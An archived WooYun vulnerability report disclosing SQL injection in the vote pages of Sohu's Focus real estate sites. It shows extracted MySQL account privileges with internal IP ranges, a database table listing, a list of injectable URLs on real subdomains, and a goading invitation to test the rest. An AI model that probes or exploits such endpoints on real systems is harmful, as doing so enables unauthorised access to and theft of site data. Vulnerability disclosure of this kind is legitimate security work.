乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-03-27: 细节已通知厂商并且等待厂商处理中 2013-03-27: 厂商已经确认,细节仅向厂商公开 2013-04-06: 细节向核心白帽子及相关领域专家公开 2013-04-16: 细节向普通白帽子公开 2013-04-26: 细节向实习白帽子公开 2013-05-11: 细节向公众公开
看了道哥的黑板报,我觉得我没接触过安全,因为我没有一个裤子!搜狐,如果你们觉得漏洞不重要可以继续忽略,哥就把该应用全国的裤子都收了!剑心,你收裤子不?
存在问题的应用为搜狐的焦点房产网,全国所有焦点房产网的vote功能都存在注入!1)仅仅举一个例子,测试站点:http://ts.focus.cn/vote/developer_intro.php?ID=90
2)测试下数据库用户什么权限,自己看吧;
[*] 'fdbuser'@'10.10.90.%' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE[*] 'fdbuser'@'10.11.160.%' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE[*] 'fdbuser'@'10.11.24.%' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE[*] 'fdbuser'@'192.168.242.%' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE[*] 'fdbuser'@'localhost' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE[*] 'mysqlmon'@'192.168.242.180' (administrator) [26]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE[*] 'pingmysql'@'10.10.58.195' [1]: privilege: USAGE[*] 'pingmysql'@'10.11.36.20' [1]: privilege: USAGE[*] 'pingmysql'@'10.11.36.22' [1]: privilege: USAGE[*] 'pingmysql'@'192.168.1.128' [1]: privilege: USAGE[*] 'pingmysql'@'192.168.1.139' [1]: privilege: USAGE[*] 'pingmysql'@'192.168.1.178' [1]: privilege: USAGE[*] 'readonly'@'%' [2]: privilege: CREATE TEMPORARY TABLES privilege: SELECT[*] 'repadm'@'192.168.242.%' [1]: privilege: REPLICATION SLAVE[*] 'repadm'@'192.168.242.87' [1]: privilege: REPLICATION SLAVE[*] 'repladmin'@'10.10.90.%' (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE[*] 'repladmin'@'192.168.242.%' [1]: privilege: REPLICATION SLAVE[*] 'root'@'127.0.0.1' (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE[*] 'root'@'localhost' (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
3)站点数据库;
4)随便找个库跑下表;
Database: tshouse[268 tables]+-------------------------+| ad_order || ad_page || ad_position || ad_sort || ad_style || ad_word || add_boss_log || admin_fakename || against_agent || agent || album_class || album_photo_count || art_sh_htopic || article_admin || article_class || article_vote || bbs_style || bj_mem_group_marks || bookmarks_category || bz_apply || click || clock || cp_msg || day_posts || db_query_cache || del_index || deny_msg || deny_photo || diary_html_head_config || diary_resident_config || dmc_account || dmc_around || dmc_askuser || dmc_board_account || dmc_board_msg || dmc_construct_type_dict || dmc_deputy || dmc_dict_power || dmc_dict_structure || dmc_direction_dict || dmc_dpxl || dmc_facilities || dmc_favorite || dmc_gov_locate || dmc_house || dmc_investor || dmc_keywords || dmc_kfs || dmc_link || dmc_loopline_dict || dmc_message || dmc_message_class || dmc_movement_info || dmc_movement_info_bak || dmc_movement_info_page || dmc_movement_info_proj || dmc_news_keywords || dmc_noun || dmc_price_incre || dmc_proj || dmc_proj_correct || dmc_proj_del || dmc_proj_effectphoto || dmc_proj_link || dmc_proj_maillist || dmc_proj_mobilelist || dmc_proj_photo || dmc_proj_price_list || dmc_proj_sale_list || dmc_proj_tag || dmc_proj_tuangou || dmc_proj_type_dict || dmc_register || dmc_related_proj || dmc_resident_dict || dmc_sale_time || dmc_search_house || dmc_set || dmc_showpiece || dmc_subject || dmc_subject_item || dmc_team || dmc_team_sub || dmc_tongzhi || dmc_txt_top || dmc_type || dmc_type_class || dmc_type_comment || dmc_user || dmc_zhoubian || elite_account || elite_article || elite_class || elite_intro || elite_pic || eml_templet || eml_templet_imgmod || eml_templet_mod || emml_email_template || emml_focus_mail || emml_list || emml_login_session || emml_mail_subscribe || emml_maillist || emml_options || emml_sendmail || emml_subscriber || emml_subscriber_del || eye_hot || files_category || focus_gift || focus_msg || focustalk_a || focustalk_jb || focustalk_q || focustalk_q_a || focustalk_suji || forum_elite_detail || forum_elite_tag || forum_favourite || forum_focus_detail || forum_news_sort || gather || gather_bak || gift_change || graph_news || graph_news_hot || graph_news_hot_seed || group_around || group_article || group_article_del || group_focus || group_forum_tongji || group_help_phone || group_info || group_member || group_member_sort || group_member_week_sort || groupweeksort || groupweeksort_temp || hide_msg || hot_news_ad || house_album_focus || house_album_info || house_bookmarks || house_click || house_click_7 || house_count || house_day_update || house_files || house_forum || house_forum_admin || house_forum_del || house_forum_delbak || house_forum_edit || house_forum_elite || house_forum_newmsg || house_forum_tags || house_forum_top || house_forum_warn || house_group || house_group_detail || house_group_pic || house_menu || house_msg_tags || house_photos || house_photos_class || house_photos_commend || house_photos_count || house_photos_del || house_photos_focus || house_photos_nearby || house_sub_forum || houseztmaker || hv_base_new || info || linkman || lock_msg || materials || materials_brand || materials_brand_class || materials_click_7 || materials_click_log || materials_commend || materials_owner || materials_photo || mem_half_marks || memberweeksort || memberweeksort_temp || modmsg || modmsg_time || msg_click_temp || msg_count || msg_count_del || msg_count_sort || msg_count_temp || msg_stat || msg_stat_week || msg_view_log || note || note_content || note_del || note_info || note_type_relation || online_user || page || permit_member || personl_order || photo_click_temp || photos_album || photos_album_del || photos_album_extend || photos_album_vote || photos_class || photos_vote || photos_vote_count || pollresult || polls || prep_subj || prep_subj_cite || prep_subj_class || prep_subj_item || project_users || py_zdwc || register_20050425 || review_renke || review_type || review_user_sort || reviewhouse || reviewhouse_assess || reviewhouse_grade || room_type || sales || sales_log || sales_order || sales_proj || secret_forum_key || secret_forum_key_log || seven_group_marks_view || sub_group_forum || tbl_bbsadmin_apply || tbl_news_media || tbl_news_sycount || tbl_news_syztcount || tbl_news_top || tbl_recommend_forum || tbl_recommend_user || tejiafang || v2012_hot_posts || vote || wap_pic_dev || wap_picture_class || warn_wordsdetail || yaohao_data1 || yaohao_data2 || yaohao_data3 || yaohao_data4 || yaohao_list || yaohao_open1 || yaohao_open2 || yaohao_open3 || yaohao_open4 || yaohao_sort1 || yaohao_sort2 || yaohao_sort3 || yaohao_sort4 || yaohao_target3 || yaohao_target4 |+-------------------------+
5)哥又检测了一些站点,肯定全国各地的焦点房产网都存在同样的问题;
http://sz.focus.cn/vote/developer_intro.php?ID=236http://cs.focus.cn/vote/developer_intro.php?ID=746http://house.focus.cn/vote/developer_intro.php?ID=2093http://bd.focus.cn/vote/developer_intro.php?ID=59http://cq.focus.cn/vote/developer_intro.php?ID=1548http://tj.focus.cn/vote/developer_intro.php?ID=827 http://zz.focus.cn/vote/developer_intro.php?ID=547http://nc.focus.cn/vote/developer_intro.php?ID=17http://huizhou.focus.cn/vote/developer_intro.php?ID=1859http://km.focus.cn/vote/developer_intro.php?ID=768http://xa.focus.cn/vote/developer_intro.php?ID=1494 http://jn.focus.cn/vote/developer_intro.php?ID=150029http://hrb.focus.cn/vote/developer_intro.php?ID=55http://dl.focus.cn/vote/developer_intro.php?ID=797http://cd.focus.cn/vote/developer_intro.php?ID=111835http://hz.focus.cn/vote/developer_intro.php?ID=687http://yc.focus.cn/vote/developer_intro.php?ID=86
PS:剩下的你们自己去测试吧!
见详细说明~
危害等级:中
漏洞Rank:10
确认时间:2013-03-27 10:39
暂无